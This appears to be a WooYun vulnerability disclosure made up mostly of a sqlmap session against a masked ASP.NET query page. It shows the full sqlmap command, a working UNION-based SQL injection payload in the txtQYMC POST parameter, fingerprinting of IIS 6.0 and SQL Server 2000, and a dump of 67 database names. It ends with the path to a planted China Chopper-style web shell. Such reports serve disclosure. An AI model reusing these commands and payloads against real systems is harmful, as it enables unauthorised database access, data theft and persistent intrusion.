WooYun.org

I:\SQL注入\sqlmap>sqlmap.py -u "http://**.**.**.**/zzcx/zzcx/chaxun.aspx" --forms --technique "U" --union-cols "40-50" --dbms "mssql" --thread 10 --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:06:47
[19:06:47] [INFO] testing connection to the target URL
[19:06:47] [INFO] searching for forms
[#1] form:
POST http://**.**.**.**:80/zzcx/zzcx/chaxun.aspx
POST data: __VIEWSTATE=%2FwEPDwUKLTQ3NDg2NDcxNA9kFgICAw9kFg5mDxAPFgYeDkRhdGFWYWx1ZUZpZWxkBQRRWVNEHg1EYXRhVGV4dEZpZWxkBQRRWVNEHgtfIURhdGFCb3VuZGdkEBUUBuWFqOecgQnmrabmsYnluIIJ5r2c5rGf5biCCeilhOaoiuW4ggnnpZ7lhpzmnrYJ5a6c5piM5biCCeWtneaEn%2BW4ggnphILlt57luIIJ5LuZ5qGD5biCCeiNhumXqOW4ggnljYHloLDluIIJ5ZK45a6B5biCCeWkqemXqOW4ggnpu4TlhojluIIJ6ZqP5bee5biCCem7hOefs%2BW4ggnojYblt57luIIJ5oGp5pa95beeCeecgeebtOi%2BlgzkuK3lpK7lnKjphIIVFAblhajnnIEJ5q2m5rGJ5biCCea9nOaxn%2BW4ggnopYTmqIrluIIJ56We5Yac5p62CeWunOaYjOW4ggnlrZ3mhJ%2FluIIJ6YSC5bee5biCCeS7meahg%2BW4ggnojYbpl6jluIIJ5Y2B5aCw5biCCeWSuOWugeW4ggnlpKnpl6jluIIJ6buE5YaI5biCCemaj%2BW3nuW4ggnpu4Tnn7PluIIJ6I2G5bee5biCCeaBqeaWveW3ngnnnIHnm7TovpYM5Lit5aSu5Zyo6YSCFCsDFGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAQ8QDxYGHwAFCE5BTUVDT0RFHwEFBE5BTUUfAmdkEBUPBuWFqOmDqB7ln47kuaHop4TliJLnvJbliLbljZXkvY3otYTotKge5bu66K6%2B5bel56iL5YuY5a%2Bf5LyB5Lia6LWE6LSoHuW7uuiuvuW3peeoi%2BiuvuiuoeS8geS4mui1hOi0qCrlt6XnqIvlu7rorr7pobnnm67mi5vmoIfku6PnkIbmnLrmnoTotYTmoLwe5bel56iL6YCg5Lu35ZKo6K%2Bi5LyB5Lia6LWE6LSoGOW3peeoi%2BebkeeQhuS8geS4mui1hOi0qBblu7rnrZHkuJrkvIHkuJrotYTotKggLeW7uuiuvuW3peeoi%2BiuvuiuoeaWveW3peS4gOS9k%2BWMluS8geS4mui1hOi0qCflu7rnrZHmlr3lt6XkvIHkuJrlronlhajnlJ%2Fkuqforrjlj6%2For4Ek5bu66K6%2B5bel56iL6LSo6YeP5qOA5rWL5py65p6E6LWE6LSoG%2BaIv%2BWcsOS6p%2BW8gOWPkeS8geS4mui1hOi0qBvmiL%2FlnLDkuqfkvLDku7fmnLrmnoTotYTotKgY54mp5Lia5pyN5Yqh5LyB5Lia6LWE6LSoHuWfjuW4guWbreael%2Be7v%2BWMluS8geS4mui1hOi0qBUPAzEwMAMxMDEDMTAyAzEwMwMxMDQDMTA1AzEwNgMxMDcDMTA4AzEwOQMxMTADMTExAzExMgMxMTMDMTE0FCsDD2hoaGhoaGhnaGhoaGhoaBYAZAICDxBkZBYAZAIDDxBkZBYAZAIEDxBkZBYAZAIFDxBkZBYAZAIJDzwrAA0BAA8WAh4HVmlzaWJsZWhkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMaW1nYnV0U2VhcmNoBQZndnF5enoPZ2SLZo09sLuwwLmH3OvDGJ86au0Z4w%3D%3D&RBUTCity=%C8%AB%CA%A1&RBUTzzlb=107&txtQYMC=&imgbutSearch.x=1&imgbutSearch.y=1&__EVENTVALIDATION=%2FwEWLQKCqfffDQLc7%2BaFDgLO%2BaTNCQKA9szMCQLotZ6fCQK686LZAgLA2Ji%2FCgKH3symCgKqxc%2FACAKDt%2F%2FtCQLuqaaCDQLrycjvCAKswoSTCAKz1aiCDQLo1qejCQLVxs%2FACALo1ruyCwLuqc7ACAKfo%2Bz6CwLvh7iWAwLhp%2BGSBwKUosHTAwLs0fnfDAKB6N%2BqAgKa%2F72BCAK%2FlpKcDgLQrPDqAwL1w9bBCQKO2rTcDwKj8aqrBQKUm%2Br1DQKpssjAAwLs0f3fDAKB6NOqAgKa%2F7GBCAK%2FlpacDgLQrPTqAwLF%2F%2FTlBwKBkeewDALA%2F9jmBwLdxpooAuvGmigC7bXmYgLCsInJAwKU9djxCjaWQZQCIcEO5cX2FH7hyW7gb4xA
do you want to test this form? [Y/n/q]
>
Edit POST data [default: __VIEWSTATE=%2FwEPDwUKLTQ3NDg2NDcxNA9kFgICAw9kFg5mDxAPFgYeDkRhdGFWYWx1ZUZpZWxkBQRRWVNEHg1EYXRhVGV4dEZpZWxkBQRRWVNEHgtfIURhdGFCb3VuZGdkEBUUBuWFqOecgQnmrabmsYnluIIJ5r2c5rGf5biCCeilhOaoiuW4ggnnpZ7lhpzmnrYJ5a6c5piM5biCCeWtneaEn%2BW4ggnphILlt57luIIJ5LuZ5qGD5biCCeiNhumXqOW4ggnljYHloLDluIIJ5ZK45a6B5biCCeWkqemXqOW4ggnpu4TlhojluIIJ6ZqP5bee5biCCem7hOefs%2BW4ggnojYblt57luIIJ5oGp5pa95beeCeecgeebtOi%2BlgzkuK3lpK7lnKjphIIVFAblhajnnIEJ5q2m5rGJ5biCCea9nOaxn%2BW4ggnopYTmqIrluIIJ56We5Yac5p62CeWunOaYjOW4ggnlrZ3mhJ%2FluIIJ6YSC5bee5biCCeS7meahg%2BW4ggnojYbpl6jluIIJ5Y2B5aCw5biCCeWSuOWugeW4ggnlpKnpl6jluIIJ6buE5YaI5biCCemaj%2BW3nuW4ggnpu4Tnn7PluIIJ6I2G5bee5biCCeaBqeaWveW3ngnnnIHnm7TovpYM5Lit5aSu5Zyo6YSCFCsDFGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAQ8QDxYGHwAFCE5BTUVDT0RFHwEFBE5BTUUfAmdkEBUPBuWFqOmDqB7ln47kuaHop4TliJLnvJbliLbljZXkvY3otYTotKge5bu66K6%2B5bel56iL5YuY5a%2Bf5LyB5Lia6LWE6LSoHuW7uuiuvuW3peeoi%2BiuvuiuoeS8geS4mui1hOi0qCrlt6XnqIvlu7rorr7pobnnm67mi5vmoIfku6PnkIbmnLrmnoTotYTmoLwe5bel56iL6YCg5Lu35ZKo6K%2Bi5LyB5Lia6LWE6LSoGOW3peeoi%2BebkeeQhuS8geS4mui1hOi0qBblu7rnrZHkuJrkvIHkuJrotYTotKggLeW7uuiuvuW3peeoi%2BiuvuiuoeaWveW3peS4gOS9k%2BWMluS8geS4mui1hOi0qCflu7rnrZHmlr3lt6XkvIHkuJrlronlhajnlJ%2Fkuqforrjlj6%2For4Ek5bu66K6%2B5bel56iL6LSo6YeP5qOA5rWL5py65p6E6LWE6LSoG%2BaIv%2BWcsOS6p%2BW8gOWPkeS8geS4mui1hOi0qBvmiL%2FlnLDkuqfkvLDku7fmnLrmnoTotYTotKgY54mp5Lia5pyN5Yqh5LyB5Lia6LWE6LSoHuWfjuW4guWbreael%2Be7v%2BWMluS8geS4mui1hOi0qBUPAzEwMAMxMDEDMTAyAzEwMwMxMDQDMTA1AzEwNgMxMDcDMTA4AzEwOQMxMTADMTExAzExMgMxMTMDMTE0FCsDD2hoaGhoaGhnaGhoaGhoaBYAZAICDxBkZBYAZAIDDxBkZBYAZAIEDxBkZBYAZAIFDxBkZBYAZAIJDzwrAA0BAA8WAh4HVmlzaWJsZWhkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMaW1nYnV0U2VhcmNoBQZndnF5enoPZ2SLZo09sLuwwLmH3OvDGJ86au0Z4w%3D%3D&RBUTCity=%C8%AB%CA%A1&RBUTzzlb=107&txtQYMC=&imgbutSearch.x=1&imgbutSearch.y=1&__EVENTVALIDATION=%2FwEWLQKCqfffDQLc7%2BaFDgLO%2BaTNCQKA9szMCQLotZ6fCQK686LZAgLA2Ji%2FCgKH3symCgKqxc%2FACAKDt%2F%2FtCQLuqaaCDQLrycjvCAKswoSTCAKz1aiCDQLo1qejCQLVxs%2FACALo1ruyCwLuqc7ACAKfo%2Bz6CwLvh7iWAwLhp%2BGSBwKUosHTAwLs0fnfDAKB6N%2BqAgKa%2F72BCAK%2FlpKcDgLQrPDqAwL1w9bBCQKO2rTcDwKj8aqrBQKUm%2Br1DQKpssjAAwLs0f3fDAKB6NOqAgKa%2F7GBCAK%2FlpacDgLQrPTqAwLF%2F%2FTlBwKBkeewDALA%2F9jmBwLdxpooAuvGmigC7bXmYgLCsInJAwKU9djxCjaWQZQCIcEO5cX2FH7hyW7gb4xA] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[19:06:48] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://**.**.**.**/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[19:06:48] [INFO] using 'I:\SQL??\sqlmap\output\results-09032015_0706pm.csv' as the CSV results file in multiple targets mode
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtQYMC
    Type: UNION query
    Title: Generic UNION query (NULL) - 47 columns (custom)
    Payload: __VIEWSTATE=/wEPDwUKLTQ3NDg2NDcxNA9kFgICAw9kFhBmDxAPFgYeDkRhdGFWYWx1ZUZpZWxkBQRRWVNEHg1EYXRhVGV4dEZpZWxkBQRRWVNEHgtfIURhdGFCb3VuZGdkEBUUBuWFqOecgQnmrabmsYnluIIJ5r2c5rGf5biCCeilhOaoiuW4ggnnpZ7lhpzmnrYJ5a6c5piM5biCCeWtneaEn W4ggnphILlt57luIIJ5LuZ5qGD5biCCeiNhumXqOW4ggnljYHloLDluIIJ5ZK45a6B5biCCeWkqemXqOW4ggnpu4TlhojluIIJ6ZqP5bee5biCCem7hOefs W4ggnojYblt57luIIJ5oGp5pa95beeCeecgeebtOi lgzkuK3lpK7lnKjphIIVFAblhajnnIEJ5q2m5rGJ5biCCea9nOaxn W4ggnopYTmqIrluIIJ56We5Yac5p62CeWunOaYjOW4ggnlrZ3mhJ/luIIJ6YSC5bee5biCCeS7meahg W4ggnojYbpl6jluIIJ5Y2B5aCw5biCCeWSuOWugeW4ggnlpKnpl6jluIIJ6buE5YaI5biCCemaj W3nuW4ggnpu4Tnn7PluIIJ6I2G5bee5biCCeaBqeaWveW3ngnnnIHnm7TovpYM5Lit5aSu5Zyo6YSCFCsDFGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAQ8QDxYGHwAFCE5BTUVDT0RFHwEFBE5BTUUfAmdkEBUPBuWFqOmDqB7ln47kuaHop4TliJLnvJbliLbljZXkvY3otYTotKge5bu66K6 5bel56iL5YuY5a f5LyB5Lia6LWE6LSoHuW7uuiuvuW3peeoi iuvuiuoeS8geS4mui1hOi0qCrlt6XnqIvlu7rorr7pobnnm67mi5vmoIfku6PnkIbmnLrmnoTotYTmoLwe5bel56iL6YCg5Lu35ZKo6K i5LyB5Lia6LWE6LSoGOW3peeoi ebkeeQhuS8geS4mui1hOi0qBblu7rnrZHkuJrkvIHkuJrotYTotKggLeW7uuiuvuW3peeoi iuvuiuoeaWveW3peS4gOS9k WMluS8geS4mui1hOi0qCflu7rnrZHmlr3lt6XkvIHkuJrlronlhajnlJ/kuqforrjlj6/or4Ek5bu66K6 5bel56iL6LSo6YeP5qOA5rWL5py65p6E6LWE6LSoG aIv WcsOS6p W8gOWPkeS8geS4mui1hOi0qBvmiL/lnLDkuqfkvLDku7fmnLrmnoTotYTotKgY54mp5Lia5pyN5Yqh5LyB5Lia6LWE6LSoHuWfjuW4guWbreael e7v WMluS8geS4mui1hOi0qBUPAzEwMAMxMDEDMTAyAzEwMwMxMDQDMTA1AzEwNgMxMDcDMTA4AzEwOQMxMTADMTExAzExMgMxMTMDMTE0FCsDD2hoaGhoaGhnaGhoaGhoaBYBAgdkAgIPEA8WBh8ABQhOQU1FQ09ERR8BBQROQU1FHwJnZBAVAw/mlr3lt6XmgLvmib/ljIUM5LiT5Lia5om/5YyFDeWKs WKoeWIhuWMhSAVAwUxMDcwMQUxMDcxMwUxMDc3NxQrAwNnZ2cWAGQCAw8QZBAVABUAFCsDABYAZAIEDxBkEBUAFQAUKwMAFgBkAgUPEGQQFQAVABQrAwAWAGQCBg8QZBAVABUAFCsDAGRkAgkPPCsADQEADxYCHgdWaXNpYmxlaGRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxpbWdidXRTZWFyY2gFBmd2cXl6eg9nZANB2ZGI8vYjOcSAWwbjY4RaCy3G&RBUTCity=%C8%AB%CA%A1&RBUTzzlb=107&txtQYMC=snGX' UNION ALL SELECT CHAR(58) CHAR(119) CHAR(98) CHAR(115) CHAR(58) CHAR(111) CHAR(70) CHAR(103) CHAR(65) CHAR(98) CHAR(111) CHAR(72) CHAR(98) CHAR(75) CHAR(115) CHAR(58) CHAR(101) CHAR(110) CHAR(97) CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &imgbutSearch.x=1&imgbutSearch.y=1&__EVENTVALIDATION=/wEWMALpr7CGDALc7 aFDgLO aTNCQKA9szMCQLotZ6fCQK686LZAgLA2Ji/CgKH3symCgKqxc/ACAKDt//tCQLuqaaCDQLrycjvCAKswoSTCAKz1aiCDQLo1qejCQLVxs/ACALo1ruyCwLuqc7ACAKfo z6CwLvh7iWAwLhp GSBwKUosHTAwLs0fnfDAKB6N qAgKa/72BCAK/lpKcDgLQrPDqAwL1w9bBCQKO2rTcDwKj8aqrBQKUm r1DQKpssjAAwLs0f3fDAKB6NOqAgKa/7GBCAK/lpacDgLQrPTqAwLF//TlBwLM5Z DDgLO5YPoBQLK5YuFCQKBkeewDALA/9jmBwLdxpooAuvGmigC7bXmYgLCsInJAwKU9djxCmaNWMKZCNAJ6JKqrfXeDSjL3x8J
---
do you want to exploit this SQL injection? [Y/n]
[19:06:50] [INFO] testing Microsoft SQL Server
[19:06:50] [INFO] confirming Microsoft SQL Server
[19:06:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:06:50] [INFO] fetching database names
[19:06:50] [INFO] the SQL query used returns 67 entries
[19:06:50] [INFO] starting 10 threads
available databases [67]:
[*] 2013313hhgh
[*] 2013szgh
[*] 2014bdgh
[*] 20150811zjttest
[*] anquanyuan
[*] applyOpen
[*] aqjdbm
[*] ArchiQty_Hb
[*] baobiao
[*] companyDB
[*] ComputerFix
[*] cpdbTemp
[*] csgh2010
[*] cxxw
[*] dctp
[*] email
[*] EyoWebDIYDB
[*] fcbaoge
[*] GardenDB
[*] GH_DaYe_Web2010
[*] gjjspxw
[*] guihuashi
[*] HBCIDB
[*] hbkcsj2009
[*] hbzjk
[*] HeXinKuDB
[*] invoicemng
[*] jcjg
[*] jcry
[*] jianzaoshi
[*] JingSaiDB
[*] JSHYBDB
[*] jxjy
[*] jzgcglj
[*] kaoshi
[*] kcsj_wu01
[*] master
[*] model
[*] msdb
[*] Northwind
[*] Oa_Test
[*] OpenKey
[*] PublicBaseTest
[*] qiaoshen
[*] QMSDatabaseTest
[*] qyzt
[*] QZWF
[*] RegBase
[*] RoomDB
[*] suohao
[*] tempdb
[*] Test
[*] tmxh2010
[*] TownBuild
[*] VoteDB
[*] weloveforever
[*] wuhandxDB
[*] wuhandxDB1
[*] xb
[*] xgjs2009ver
[*] xgjs2015
[*] xxtd-new
[*] XzyjsDB
[*] yushen
[*] zbdlDB
[*] zcks
[*] zjt20111018

地址:http://**.**.**.**/test/timu/chopper.asp
密码:http://**.**.**.**/test/timu/chopper.asp